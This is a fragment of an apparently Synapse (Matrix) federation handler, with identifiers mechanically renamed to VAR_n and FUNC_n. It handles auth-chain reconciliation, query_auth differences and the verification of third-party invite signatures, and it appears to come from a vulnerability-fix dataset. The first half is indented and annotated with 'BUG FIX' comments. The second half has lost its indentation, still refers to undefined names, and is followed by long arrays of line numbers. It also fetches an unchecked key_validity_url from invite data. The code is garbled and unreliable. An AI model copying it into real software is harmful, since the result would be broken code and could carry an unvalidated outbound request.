        VAR_170 for k, VAR_170 in VAR_126.items() if k in VAR_112
    ]
    VAR_114 = await self.store.get_events(VAR_113)
    VAR_115 = {
        (VAR_170.type, VAR_170.state_key): VAR_170 for VAR_170 in VAR_114.values()
    }
    try:
        event_auth.check(VAR_90, VAR_1, VAR_3=VAR_115)
    except AuthError as VAR_170:
        VAR_0.warning("Soft-failing %r because %s", VAR_1, VAR_170)
        VAR_1.internal_metadata.soft_failed = True
async def FUNC_31(
    self, VAR_5, VAR_12, VAR_11, VAR_35, VAR_36, VAR_37
):
    """Handle a /query_auth request: absorb the remote's auth events,
    then return the difference between our auth chain and theirs."""
    VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
    if not VAR_101:
        raise AuthError(403, "Host not in room.")
    VAR_1 = await self.store.get_event(VAR_12, check_room_id=VAR_11)
    # Absorb the remote's auth events; ones that fail auth are skipped.
    for VAR_170 in VAR_35:
        try:
            await self._handle_new_event(VAR_5, VAR_170)
        except AuthError:
            pass
    VAR_116 = await self.store.get_auth_chain(
        list(VAR_1.auth_event_ids()), include_given=True
    )
    VAR_117 = await self.construct_auth_difference(VAR_116, VAR_35)
    VAR_0.debug("on_query_auth returning: %s", VAR_117)
    return VAR_117
async def FUNC_32(
    self, VAR_5, VAR_11, VAR_38, VAR_39, VAR_17
):
    """Handle a /get_missing_events request from VAR_5: return up to 20
    events between VAR_38 and VAR_39, filtered for that server."""
    VAR_101 = await self.auth.check_host_in_room(VAR_11, VAR_5)
    if not VAR_101:
        raise AuthError(403, "Host not in room.")
    VAR_17 = min(VAR_17, 20)
    # BUG FIX: the keyword values referenced the undefined names
    # `room_id`, `earliest_events`, `latest_events` and `limit`; pass the
    # actual parameters through.
    VAR_65 = await self.store.get_missing_events(
        VAR_11=VAR_11,
        VAR_38=VAR_38,
        VAR_39=VAR_39,
        VAR_17=VAR_17,
    )
    VAR_65 = await filter_events_for_server(
        self.storage, VAR_5, VAR_65
    )
    return VAR_65
async def FUNC_33(
    self,
    VAR_5: str,
    VAR_1: EventBase,
    VAR_32: EventContext,
    VAR_3: MutableStateMap[EventBase],
) -> EventContext:
    """Auth-check VAR_1 against VAR_3, first attempting to fill in any
    auth events we are missing from the remote. On auth failure the
    context is marked rejected rather than raising."""
    VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
    VAR_90 = KNOWN_ROOM_VERSIONS[VAR_28]
    try:
        VAR_32 = await self._update_auth_events_and_context_for_auth(
            VAR_5, VAR_1, VAR_32, VAR_3
        )
    except Exception:
        # Best-effort: fall back to auth-checking with what we have.
        VAR_0.exception(
            "Failed to double check VAR_89 VAR_20 for %s with remote. "
            "Ignoring failure and continuing processing of VAR_1.",
            VAR_1.event_id,
        )
    try:
        # BUG FIX: `VAR_3=auth_events` referenced an undefined name; the
        # parameter is VAR_3.
        event_auth.check(VAR_90, VAR_1, VAR_3=VAR_3)
    except AuthError as VAR_170:
        VAR_0.warning("Failed VAR_89 resolution for %r because %s", VAR_1, VAR_170)
        VAR_32.rejected = RejectedReason.AUTH_ERROR
    return VAR_32
async def FUNC_34(
    self,
    VAR_5: str,
    VAR_1: EventBase,
    VAR_32: EventContext,
    VAR_3: MutableStateMap[EventBase],
) -> EventContext:
    """Reconcile VAR_1's claimed auth events with our own view.

    Fetches auth events we have never seen from VAR_5, and where the
    event refers to auth events that differ from our calculated auth
    chain, state-resolves the two sets, updates VAR_3 in place, and
    rebuilds the context accordingly.
    """
    VAR_118 = set(VAR_1.auth_event_ids())
    VAR_119 = VAR_118.difference(
        VAR_170.event_id for VAR_170 in VAR_3.values()
    )
    if VAR_119:
        VAR_178 = await self.store.have_seen_events(VAR_119)
        VAR_0.debug("Events %s are in the store", VAR_178)
        VAR_119.difference_update(VAR_178)
    if VAR_119:
        # Some claimed auth events are entirely unknown to us: fetch the
        # remote's auth chain for the event and absorb what is new.
        VAR_0.info("auth_events contains unknown VAR_20: %s", VAR_119)
        try:
            try:
                VAR_35 = await self.federation_client.get_event_auth(
                    VAR_5, VAR_1.room_id, VAR_1.event_id
                )
            except RequestSendFailed as e1:
                # Transport error: carry on with what we have.
                VAR_0.info("Failed to get VAR_1 VAR_89 from remote: %s", e1)
                return VAR_32
            VAR_190 = await self.store.have_seen_events(
                [VAR_170.event_id for VAR_170 in VAR_35]
            )
            for VAR_170 in VAR_35:
                if VAR_170.event_id in VAR_190:
                    continue
                if VAR_170.event_id == VAR_1.event_id:
                    continue
                try:
                    VAR_201 = VAR_170.auth_event_ids()
                    # Build this auth event's own auth map from the
                    # returned chain (plus any create event).
                    VAR_89 = {
                        (VAR_170.type, VAR_170.state_key): VAR_170
                        for VAR_170 in VAR_35
                        if VAR_170.event_id in VAR_201 or VAR_170.type == VAR_188.Create
                    }
                    VAR_170.internal_metadata.outlier = True
                    VAR_0.debug(
                        "do_auth %s VAR_119: %s", VAR_1.event_id, VAR_170.event_id
                    )
                    await self._handle_new_event(VAR_5, VAR_170, VAR_3=VAR_89)
                    if VAR_170.event_id in VAR_118:
                        VAR_3[(VAR_170.type, VAR_170.state_key)] = VAR_170
                except AuthError:
                    pass
        except Exception:
            # Best-effort; failures fall through to the checks below.
            VAR_0.exception("Failed to get VAR_89 chain")
    if VAR_1.internal_metadata.is_outlier():
        # Outliers have no meaningful state to resolve against.
        VAR_0.info("Skipping auth_event fetch for outlier")
        return VAR_32
    VAR_120 = VAR_118.difference(
        VAR_170.event_id for VAR_170 in VAR_3.values()
    )
    if not VAR_120:
        return VAR_32
    VAR_0.info(
        "auth_events refers to VAR_20 which are not in our calculated VAR_89 "
        "chain: %s",
        VAR_120,
    )
    VAR_121 = await self.store.get_events_as_list(VAR_120)
    for d in VAR_121:
        if d.room_id != VAR_1.room_id:
            # Cross-room auth references are bogus; bail out unchanged.
            VAR_0.warning(
                "Event %s refers to auth_event %s which is in a different room",
                VAR_1.event_id,
                d.event_id,
            )
            return VAR_32
    # State-resolve our auth set against ours + the event's extras.
    VAR_122 = VAR_3.values()
    VAR_123 = dict(VAR_3)
    VAR_123.update({(d.type, d.state_key): d for d in VAR_121})
    VAR_62 = VAR_123.values()
    VAR_28 = await self.store.get_room_version_id(VAR_1.room_id)
    VAR_124 = await self.state_handler.resolve_events(
        VAR_28, (VAR_122, VAR_62), VAR_1
    )
    VAR_0.info(
        "After VAR_2 VAR_168: updating VAR_3 with new VAR_2 %s",
        {
            (d.type, d.state_key): d.event_id
            for d in VAR_124.values()
            if VAR_3.get((d.type, d.state_key)) != d
        },
    )
    # Mutates the caller's map deliberately, then rebuild the context.
    VAR_3.update(VAR_124)
    VAR_32 = await self._update_context_for_auth_events(
        VAR_1, VAR_32, VAR_3
    )
    return VAR_32
async def FUNC_35(
    self, VAR_1: EventBase, VAR_32: EventContext, VAR_3: StateMap[EventBase]
) -> EventContext:
    """Rebuild VAR_1's context on top of the given auth events, storing a
    new state group that layers them over the existing state."""
    if VAR_1.is_state():
        VAR_179 = (VAR_1.type, VAR_1.state_key)  # type: Optional[Tuple[str, str]]
    else:
        VAR_179 = None
    # The deltas exclude the event's own (type, state_key), if any.
    VAR_125 = {
        k: a.event_id for k, a in VAR_3.items() if k != VAR_179
    }
    VAR_126 = await VAR_32.get_current_state_ids()
    VAR_126 = dict(VAR_126)  # type: ignore
    VAR_126.update(VAR_125)
    VAR_94 = await VAR_32.get_prev_state_ids()
    VAR_94 = dict(VAR_94)
    # BUG FIX: `prev_state_ids` is not a name in scope -- the dict built
    # above is VAR_94.
    VAR_94.update({k: a.event_id for k, a in VAR_3.items()})
    VAR_127 = VAR_32.state_group
    # BUG FIX: keyword values referenced the undefined names `prev_group`
    # and `current_state_ids`; use the locals.
    VAR_128 = await self.state_store.store_state_group(
        VAR_1.event_id,
        VAR_1.room_id,
        VAR_127=VAR_127,
        delta_ids=VAR_125,
        VAR_126=VAR_126,
    )
    # BUG FIX: likewise `state_group` / `prev_state_ids` below.
    return EventContext.with_state(
        VAR_128=VAR_128,
        state_group_before_event=VAR_32.state_group_before_event,
        VAR_126=VAR_126,
        VAR_94=VAR_94,
        VAR_127=VAR_127,
        delta_ids=VAR_125,
    )
async def FUNC_36(
    self, VAR_40: Iterable[EventBase], VAR_41: Iterable[EventBase]
) -> Dict:
    """Compute the difference between our local auth chain (VAR_40) and a
    remote one (VAR_41): which remote events we reject (with reasons) and
    which local events the remote is missing."""
    VAR_0.debug("construct_auth_difference Start!")

    def FUNC_50(VAR_21):
        # Stable ordering for the merge walk below.
        return VAR_21.depth, VAR_21.event_id

    VAR_0.debug("construct_auth_difference after FUNC_50!")
    # BUG FIX: list.sort takes `key=`; `VAR_144=` is not a valid kwarg.
    VAR_129 = list(VAR_41)
    VAR_129.sort(key=FUNC_50)
    VAR_130 = list(VAR_40)
    VAR_130.sort(key=FUNC_50)
    VAR_131 = iter(VAR_130)
    VAR_132 = iter(VAR_129)
    VAR_0.debug("construct_auth_difference before FUNC_51!")

    def FUNC_51(VAR_133, VAR_134=None):
        # next() with a default, swallowing StopIteration.
        try:
            return next(VAR_133)
        except Exception:
            return VAR_134

    VAR_135 = FUNC_51(VAR_131)
    VAR_136 = FUNC_51(VAR_132)
    VAR_0.debug("construct_auth_difference before while")
    VAR_137 = []
    VAR_138 = []
    # Merge-walk both sorted chains, collecting events unique to each:
    # VAR_138 = only in our chain, VAR_137 = only in the remote's.
    while VAR_135 or VAR_136:
        if VAR_136 is None:
            VAR_138.append(VAR_135)
            VAR_135 = FUNC_51(VAR_131)
            continue
        if VAR_135 is None:
            VAR_137.append(VAR_136)
            VAR_136 = FUNC_51(VAR_132)
            continue
        if VAR_135.event_id == VAR_136.event_id:
            VAR_135 = FUNC_51(VAR_131)
            VAR_136 = FUNC_51(VAR_132)
            continue
        if VAR_135.depth < VAR_136.depth:
            VAR_138.append(VAR_135)
            VAR_135 = FUNC_51(VAR_131)
            continue
        if VAR_135.depth > VAR_136.depth:
            VAR_137.append(VAR_136)
            VAR_136 = FUNC_51(VAR_132)
            continue
        # Equal depth, different ids: advance by event-id order.
        # NOTE(review): if the first branch exhausts VAR_131, VAR_135 can
        # be None when the second comparison runs -- preserved as-is.
        if VAR_135.event_id < VAR_136.event_id:
            VAR_138.append(VAR_135)
            VAR_135 = FUNC_51(VAR_131)
        if VAR_135.event_id > VAR_136.event_id:
            VAR_137.append(VAR_136)
            VAR_136 = FUNC_51(VAR_132)
        continue
    VAR_0.debug("construct_auth_difference after while")
    # Keep only remote-unique events none of whose auth events are also
    # remote-unique (i.e. the roots of the remote-only subgraph).
    VAR_139 = [VAR_170.event_id for VAR_170 in VAR_137]
    VAR_140 = list(VAR_137)
    for VAR_170 in VAR_137:
        for VAR_160 in VAR_170.auth_event_ids():
            if VAR_160 in VAR_139:
                try:
                    VAR_140.remove(VAR_170)
                except ValueError:
                    pass
    VAR_141 = {}
    for VAR_170 in VAR_140:
        VAR_180 = await self.store.get_rejection_reason(VAR_170.event_id)
        if VAR_180 is None:
            continue
        VAR_141[VAR_170.event_id] = VAR_180
    VAR_0.debug("construct_auth_difference returning")
    return {
        "auth_chain": VAR_40,
        "rejects": {
            VAR_170.event_id: {"reason": VAR_141[VAR_170.event_id], "proof": None}
            for VAR_170 in VAR_140
        },
        "missing": [VAR_170.event_id for VAR_170 in VAR_138],
    }
@log_function
async def FUNC_37(
    self, VAR_42, VAR_43, VAR_11, VAR_44
):
    """Exchange a third-party invite for a real m.room.member invite.

    If we are in the room we build, auth and send the invite ourselves;
    otherwise we forward the request to the involved servers.
    """
    VAR_142 = {"signed": VAR_44}
    VAR_45 = {
        "type": VAR_188.Member,
        "content": {
            "membership": Membership.INVITE,
            "third_party_invite": VAR_142,
        },
        "room_id": VAR_11,
        "sender": VAR_42,
        "state_key": VAR_43,
    }
    if await self.auth.check_host_in_room(VAR_11, self.hs.hostname):
        VAR_28 = await self.store.get_room_version_id(VAR_11)
        VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
        EventValidator().validate_builder(VAR_93)
        # BUG FIX: `VAR_93=builder` referenced an undefined name; the
        # local builder is VAR_93.
        VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
            VAR_93=VAR_93
        )
        VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
            VAR_28, VAR_45, VAR_1, VAR_32
        )
        EventValidator().validate_new(VAR_1, self.config)
        VAR_1.internal_metadata.send_on_behalf_of = self.hs.hostname
        try:
            await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
        except AuthError as VAR_170:
            VAR_0.warning("Denying new third party invite %r because %s", VAR_1, VAR_170)
            raise VAR_170
        await self._check_signature(VAR_1, VAR_32)
        VAR_143 = self.hs.get_room_member_handler()
        await VAR_143.send_membership_event(None, VAR_1, VAR_32)
    else:
        # Not in the room: forward to the sender's and room's domains.
        VAR_181 = {VAR_204.split(":", 1)[-1] for VAR_204 in (VAR_42, VAR_11)}
        await self.federation_client.forward_third_party_invite(
            VAR_181, VAR_11, VAR_45
        )
async def FUNC_38(
self, VAR_45: JsonDict
) -> None:
assert_params_in_dict(VAR_45, ["room_id"])
VAR_28 = await self.store.get_room_version_id(VAR_45["room_id"])
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
VAR_1, VAR_32 = await self.add_display_name_to_third_party_invite(
VAR_28, VAR_45, VAR_1, VAR_32
)
try:
await self.auth.check_from_context(VAR_28, VAR_1, VAR_32)
except AuthError as VAR_170:
VAR_0.warning("Denying third party invite %r because %s", VAR_1, VAR_170)
raise VAR_170
await self._check_signature(VAR_1, VAR_32)
VAR_1.internal_metadata.send_on_behalf_of = get_domain_from_id(VAR_1.sender)
VAR_143 = self.hs.get_room_member_handler()
await VAR_143.send_membership_event(None, VAR_1, VAR_32)
async def FUNC_39(
self, VAR_28, VAR_45, VAR_1, VAR_32
):
VAR_144 = (
VAR_188.ThirdPartyInvite,
VAR_1.content["third_party_invite"]["signed"]["token"],
)
VAR_145 = None
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_146 = VAR_94.get(VAR_144)
if VAR_146:
VAR_145 = await self.store.get_event(
VAR_146, allow_none=True
)
if VAR_145:
VAR_182 = VAR_145.content.get("display_name")
VAR_45["content"]["third_party_invite"]["display_name"] = VAR_182
else:
VAR_0.info(
"Could not find invite VAR_1 for VAR_142: %r", VAR_45
)
VAR_93 = self.event_builder_factory.new(VAR_28, VAR_45)
EventValidator().validate_builder(VAR_93)
VAR_1, VAR_32 = await self.event_creation_handler.create_new_client_event(
VAR_93=builder
)
EventValidator().validate_new(VAR_1, self.config)
return (VAR_1, VAR_32)
async def FUNC_40(self, VAR_1, VAR_32):
VAR_44 = VAR_1.content["third_party_invite"]["signed"]
VAR_147 = VAR_44["token"]
VAR_94 = await VAR_32.get_prev_state_ids()
VAR_148 = VAR_94.get((VAR_188.ThirdPartyInvite, VAR_147))
VAR_149 = None
if VAR_148:
VAR_149 = await self.store.get_event(VAR_148, allow_none=True)
if not VAR_149:
raise AuthError(403, "Could not find invite")
VAR_0.debug("Checking VAR_89 on VAR_1 %r", VAR_1.content)
VAR_150 = None # type: Optional[Exception]
for public_key_object in self.hs.get_auth().get_public_keys(VAR_149):
try:
for server, signature_block in VAR_44["signatures"].items():
for VAR_199, encoded_signature in signature_block.items():
if not VAR_199.startswith("ed25519:"):
continue
VAR_0.debug(
"Attempting to verify sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
try:
VAR_46 = public_key_object["public_key"]
VAR_203 = decode_verify_key_bytes(
VAR_199, decode_base64(VAR_46)
)
verify_signed_json(VAR_44, server, VAR_203)
VAR_0.debug(
"Successfully verified sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
except Exception:
VAR_0.info(
"Failed to verify sig with VAR_144 %s from %r "
"against pubkey %r",
VAR_199,
server,
public_key_object,
)
raise
try:
if "key_validity_url" in public_key_object:
await self._check_key_revocation(
VAR_46, public_key_object["key_validity_url"]
)
except Exception:
VAR_0.info(
"Failed to query key_validity_url %s",
public_key_object["key_validity_url"],
)
raise
return
except Exception as VAR_170:
VAR_150 = VAR_170
if VAR_150 is None:
raise RuntimeError("no public VAR_144 in invite event")
raise VAR_150
async def FUNC_41(self, VAR_46, VAR_47):
try:
VAR_183 = await self.http_client.get_json(VAR_47, {"public_key": VAR_46})
except Exception:
raise SynapseError(502, "Third party certificate could not be checked")
if "valid" not in VAR_183 or not VAR_183["valid"]:
raise AuthError(403, "Third party certificate was invalid")
async def FUNC_42(
self,
VAR_11: str,
VAR_48: Sequence[Tuple[EventBase, EventContext]],
VAR_33: bool = False,
) -> int:
VAR_151 = self.config.worker.events_shard_config.get_instance(VAR_11)
if VAR_151 != self._instance_name:
VAR_184 = await self._send_events(
instance_name=VAR_151,
store=self.store,
VAR_11=room_id,
VAR_48=event_and_contexts,
VAR_33=backfilled,
)
return VAR_184["max_stream_id"]
else:
assert self.storage.persistence
VAR_20, VAR_49 = await self.storage.persistence.persist_events(
VAR_48, VAR_33=backfilled
)
if self._ephemeral_messages_enabled:
for VAR_1 in VAR_20:
self._message_handler.maybe_schedule_expiry(VAR_1)
if not VAR_33: # Never notify for VAR_33 VAR_20
for VAR_1 in VAR_20:
await self._notify_persisted_event(VAR_1, VAR_49)
return VAR_49.stream
async def FUNC_43(
self, VAR_1: EventBase, VAR_49: RoomStreamToken
) -> None:
VAR_152 = []
if VAR_1.type == VAR_188.Member:
VAR_43 = VAR_1.state_key
if VAR_1.internal_metadata.is_outlier():
if VAR_1.membership != Membership.INVITE:
if not self.is_mine_id(VAR_43):
return
VAR_185 = UserID.from_string(VAR_43)
VAR_152.append(VAR_185)
elif VAR_1.internal_metadata.is_outlier():
return
assert VAR_1.internal_metadata.stream_ordering
VAR_153 = PersistedEventPosition(
self._instance_name, VAR_1.internal_metadata.stream_ordering
)
self.notifier.on_new_room_event(
VAR_1, VAR_153, VAR_49, VAR_152=extra_users
)
async def FUNC_44(self, VAR_11: str) -> None:
if self.config.worker_app:
await self._clean_room_for_join_client(VAR_11)
else:
await self.store.clean_room_for_join(VAR_11)
async def FUNC_45(
self, VAR_50: List[str], VAR_11: str
) -> Optional[dict]:
for host in VAR_50:
VAR_168 = await self.federation_client.get_room_complexity(host, VAR_11)
if VAR_168:
return VAR_168
return None
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
19,
25,
30,
32,
88,
91,
93,
94,
98,
101,
103,
106,
110,
111,
122,
125,
127,
146,
151,
164,
165,
166,
169,
171,
173,
177,
185,
188,
190,
191,
195,
196,
197,
198,
206,
207,
208,
209,
217,
218,
219,
229,
230,
231,
232,
233,
234,
235,
245,
247,
248,
250,
252,
254,
257,
259,
260,
261,
262,
267,
268,
283,
293,
294,
295,
297,
304,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
347,
353,
354,
355,
358,
360,
361,
363,
364,
366,
367,
368,
373,
375,
376,
377,
381,
386,
389,
398,
399,
400,
401,
402,
403,
410,
426,
428,
437,
440,
442,
445,
447,
448,
449,
452,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
520,
521,
522,
527,
535,
536,
537,
539,
560,
569,
576,
587,
589,
592,
596,
604,
608,
615,
618,
620,
625,
627,
631,
636,
641,
643,
650,
654,
655,
656,
660,
661,
662,
663,
664,
665,
671,
673,
674,
675,
684,
686,
688,
694,
697,
699,
706,
708,
713,
714,
715,
719,
721,
723,
734,
735,
737,
738,
739,
740,
741,
743,
746,
751,
755,
756,
759,
762,
763,
769,
770,
771,
780,
785,
790,
793,
794,
801,
805,
808,
812,
819,
823,
826,
827,
828,
829,
830,
831,
832,
833,
834,
835,
836,
837,
841,
843,
846,
848,
850,
851,
852,
853,
855,
857,
858,
859,
874,
885,
887,
888,
889,
891,
892,
895,
910,
913,
914,
916,
920,
921,
922,
924,
925,
926,
927,
929,
931,
937,
948,
952,
953,
954,
955,
956,
957,
958,
959,
960,
961,
962,
963,
964,
965,
966,
967,
968,
969,
970,
971,
972,
973,
974,
975,
976,
977,
978,
980,
986,
987,
988,
996,
999,
1000,
1003,
1004,
1005,
1006,
1007,
1008,
1009,
1010,
1011,
1012,
1021,
1029,
1030,
1031,
1032,
1033,
1034,
1035,
1036,
1040,
1041,
1042,
1043,
1044,
1047,
1048,
1049,
1051,
1052,
1053,
1054,
1055,
1056,
1058,
1061,
1065,
1075,
1087,
1089,
1091,
1095,
1097,
1103,
1104,
1105,
1113,
1119,
1134,
1136,
1140,
1141,
1142,
1143,
1146,
1148,
1156,
1157,
1158,
1160,
1173,
1176,
1182,
1184,
1186,
1191,
1195,
1198,
1200,
1202,
1214,
1216,
1224,
1226,
1227,
1228,
1229,
1230,
1240,
1250,
1252,
1256,
1260,
1264,
1267,
1269,
1280,
1288,
1291,
1300,
1302,
1309,
1315,
1320,
1323,
1326,
1328,
1330,
1333,
1334,
1336,
1338,
1347,
1348,
1349,
1350,
1352,
1354,
1356,
1358,
1360,
1361,
1368,
1372,
1377,
1381,
1384,
1386,
1387,
1388,
1389,
1390,
1391,
1392,
1393,
1394,
1395,
1399,
1403,
1404,
1405,
1411,
1412,
1413,
1421,
1422,
1427,
1433,
1434,
1435,
1436,
1437,
1438,
1439,
1441,
1444,
1463,
1470,
1483,
1484,
1485,
1487,
1488,
1495,
1497,
1508,
1516,
1517,
1518,
1522,
1524,
1530,
1537,
1545,
1547,
1548,
1549,
1550,
1551,
1552,
1553,
1554,
1555,
1556,
1557,
1558,
1559,
1561,
1563,
1569,
1571,
1574,
1576,
1578,
1583,
1588,
1592,
1595,
1602,
1606,
1612,
1615,
1616,
1619,
1620,
1621,
1622,
1626,
1629,
1638,
1641,
1643,
1650,
1651,
1654,
1655,
1656,
1663,
1665,
1670,
1672,
1689,
1691,
1692,
1693,
1699,
1706,
1719,
1731,
1735,
1737,
1738,
1745,
1747,
1751,
1757,
1765,
1767,
1769,
1775,
1777,
1781,
1783,
1785,
1789,
1791,
1799,
1804,
1809,
1811,
1815,
1817,
1824,
1828,
1836,
1837,
1839,
1841,
1843,
1845,
1851,
1856,
1859,
1866,
1871,
1877,
1880,
1887,
1897,
1906,
1908,
1920,
1923,
1935,
1942,
1951,
1965,
1967,
1982,
1986,
1992,
1994,
1995,
1997,
2001,
2004,
2010,
2019,
2028,
2032,
2033,
2034,
2035,
2036,
2037,
2039,
2043,
2051,
2055,
2059,
2069,
2077,
2078,
2079,
2087,
2089,
2092,
2095,
2097,
2103,
2109,
2110,
2111,
2114,
2118,
2120,
2121,
2123,
2126,
2127,
2129,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2139,
2140,
2156,
2160,
2161,
2166,
2171,
2177,
2184,
2186,
2187,
2188,
2194,
2195,
2199,
2200,
2201,
2202,
2204,
2206,
2208,
2215,
2216,
2218,
2225,
2229,
2231,
2240,
2247,
2252,
2259,
2265,
2266,
2267,
2268,
2274,
2280,
2282,
2291,
2296,
2300,
2305,
2308,
2313,
2315,
2320,
2321,
2322,
2326,
2327,
2328,
2329,
2334,
2336,
2344,
2345,
2348,
2352,
2356,
2359,
2368,
2373,
2378,
2381,
2383,
2384,
2385,
2386,
2387,
2390,
2394,
2397,
2403,
2404,
2405,
2407,
2415,
2416,
2417,
2418,
2419,
2420,
2421,
2423,
2424,
2425,
2426,
2431,
2436,
2445,
2447,
2451,
2453,
2459,
2462,
2464,
2466,
2470,
2478,
2481,
2483,
2486,
2488,
2489,
2498,
2507,
2513,
2517,
2521,
2523,
2524,
2525,
2526,
2529,
2531,
2532,
2533,
2534,
2535,
2536,
2537,
2540,
2543,
2546,
2548,
2554,
2557,
2559,
2567,
2572,
2577,
2582,
2587,
2588,
2592,
2597,
2599,
2600,
2601,
2602,
2603,
2604,
2605,
2615,
2617,
2621,
2622,
2624,
2626,
2628,
2637,
2643,
2654,
2658,
2663,
2667,
2669,
2670,
2671,
2673,
2679,
2681,
2682,
2690,
2695,
2698,
2701,
2705,
2706,
2707,
2709,
2716,
2723,
2724,
2725,
2727,
2728,
2731,
2747,
2748,
2749,
2750,
2751,
2758,
2759,
2760,
2761,
2769,
2773,
2777,
2786,
2789,
2793,
2796,
2798,
2800,
2801,
2804,
2809,
2817,
2854,
2856,
2857,
2859,
2861,
2865,
2869,
2881,
2890,
2911,
2912,
2913,
2917,
2920,
2922,
2926,
2928,
2934,
2939,
2943,
2944,
2945,
2950,
2955,
2956,
2958,
2965,
2969,
2977,
2983,
2987,
2992,
2995,
2996,
2999,
3000,
3001,
3003,
18,
97,
98,
99,
100,
101,
102,
103,
104,
105,
113,
114,
115,
116,
117,
118,
119,
120,
121,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
430,
431,
432,
433,
434,
435,
436,
568,
569,
570,
571,
572,
573,
574,
575,
576,
577,
578,
579,
580,
624,
625,
626,
627,
628,
629,
630,
631,
632,
633,
634,
635,
636,
637,
638,
639,
692,
693,
694,
695,
696,
697,
698,
699,
700,
701,
702,
703,
787,
788,
789,
804,
805,
806,
807,
808,
809,
810,
811,
812,
813,
814,
815,
816,
935,
936,
937,
938,
939,
940,
941,
942,
943,
944,
945,
946,
1190,
1191,
1192,
1193,
1194,
1195,
1196,
1197,
1258,
1259,
1260,
1261,
1262,
1263,
1264,
1265,
1266,
1267,
1268,
1269,
1270,
1271,
1272,
1290,
1291,
1292,
1293,
1313,
1314,
1315,
1316,
1317,
1318,
1319,
1320,
1321,
1322,
1323,
1324,
1325,
1326,
1327,
1328,
1329,
1330,
1331,
1332,
1443,
1444,
1445,
1446,
1447,
1448,
1467,
1468,
1469,
1470,
1471,
1472,
1473,
1474,
1475,
1526,
1527,
1528,
1582,
1583,
1584,
1585,
1703,
1704,
1705,
1706,
1707,
1708,
1709,
1710,
1711,
1749,
1779,
1780,
1806,
1807,
1850,
1851,
1852,
1853,
1854,
1855,
1856,
1857,
1858,
1859,
1860,
1861,
1862,
1916,
1917,
1918,
1919,
1920,
1921,
1922,
1961,
1962,
1963,
1964,
1965,
1966,
1967,
1968,
1969,
1970,
1971,
1972,
1973,
1974,
1975,
1976,
2101,
2102,
2103,
2104,
2105,
2106,
2107,
2108,
2239,
2240,
2241,
2242,
2243,
2244,
2245,
2246,
2247,
2248,
2249,
2250,
2251,
2252,
2253,
2254,
2255,
2256,
2290,
2291,
2292,
2293,
2294,
2295,
2296,
2297,
2298,
2299,
2300,
2301,
2302,
2303,
2304,
2305,
2306,
2307,
2308,
2309,
2310,
2311,
2312,
2313,
2314,
2315,
2316,
2317,
2318,
2457,
2458,
2459,
2460,
2461,
2462,
2463,
2464,
2465,
2466,
2467,
2468,
2469,
2511,
2512,
2513,
2514,
2515,
2516,
2517,
2518,
2519,
2520,
2694,
2695,
2696,
2697,
2698,
2699,
2700,
2701,
2702,
2771,
2772,
2773,
2774,
2775,
2776,
2777,
2778,
2779,
2780,
2781,
2782,
2783,
2863,
2864,
2865,
2866,
2867,
2868,
2869,
2870,
2871,
2872,
2873,
2874,
2888,
2889,
2890,
2891,
2892,
2893,
2894,
2895,
2896,
2897,
2898,
2932,
2933,
2934,
2935,
2936,
2937,
2938,
2967,
2968,
2969,
2970,
2971,
2972,
2981,
2982,
2983,
2984,
2985,
2986,
2987,
2988,
2989,
2990,
2991,
1060,
1061,
1062,
1063,
1064,
1065,
1066,
1067,
1068,
1069
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
19,
25,
30,
32,
88,
91,
93,
94,
98,
101,
103,
106,
110,
111,
122,
125,
127,
146,
151,
164,
165,
166,
169,
171,
173,
177,
185,
188,
190,
191,
195,
196,
197,
198,
206,
207,
208,
209,
217,
218,
219,
229,
230,
231,
232,
233,
234,
235,
245,
247,
248,
250,
252,
254,
257,
259,
260,
261,
262,
267,
268,
283,
293,
294,
295,
297,
304,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
326,
327,
328,
329,
347,
353,
354,
355,
358,
360,
361,
363,
364,
366,
367,
368,
373,
375,
376,
377,
381,
386,
389,
398,
399,
400,
401,
402,
403,
410,
426,
428,
437,
440,
442,
445,
447,
448,
449,
452,
460,
461,
462,
463,
464,
465,
466,
467,
468,
469,
470,
471,
472,
473,
474,
475,
476,
477,
478,
479,
480,
481,
482,
483,
484,
485,
486,
487,
488,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
500,
501,
502,
503,
504,
505,
506,
507,
508,
520,
521,
522,
527,
535,
536,
537,
539,
560,
569,
576,
587,
589,
592,
596,
604,
608,
615,
618,
620,
625,
627,
631,
636,
641,
643,
650,
654,
655,
656,
660,
661,
662,
663,
664,
665,
671,
673,
674,
675,
684,
686,
688,
694,
697,
699,
706,
708,
713,
714,
715,
719,
721,
723,
734,
735,
737,
738,
739,
740,
741,
743,
746,
751,
755,
756,
759,
762,
763,
769,
770,
771,
780,
785,
790,
793,
794,
801,
805,
808,
812,
819,
823,
826,
827,
828,
829,
830,
831,
832,
833,
834,
835,
836,
837,
841,
843,
846,
848,
850,
851,
852,
853,
855,
857,
858,
859,
874,
885,
887,
888,
889,
891,
892,
895,
910,
913,
914,
916,
920,
921,
922,
924,
925,
926,
927,
929,
931,
937,
948,
952,
953,
954,
955,
956,
957,
958,
959,
960,
961,
962,
963,
964,
965,
966,
967,
968,
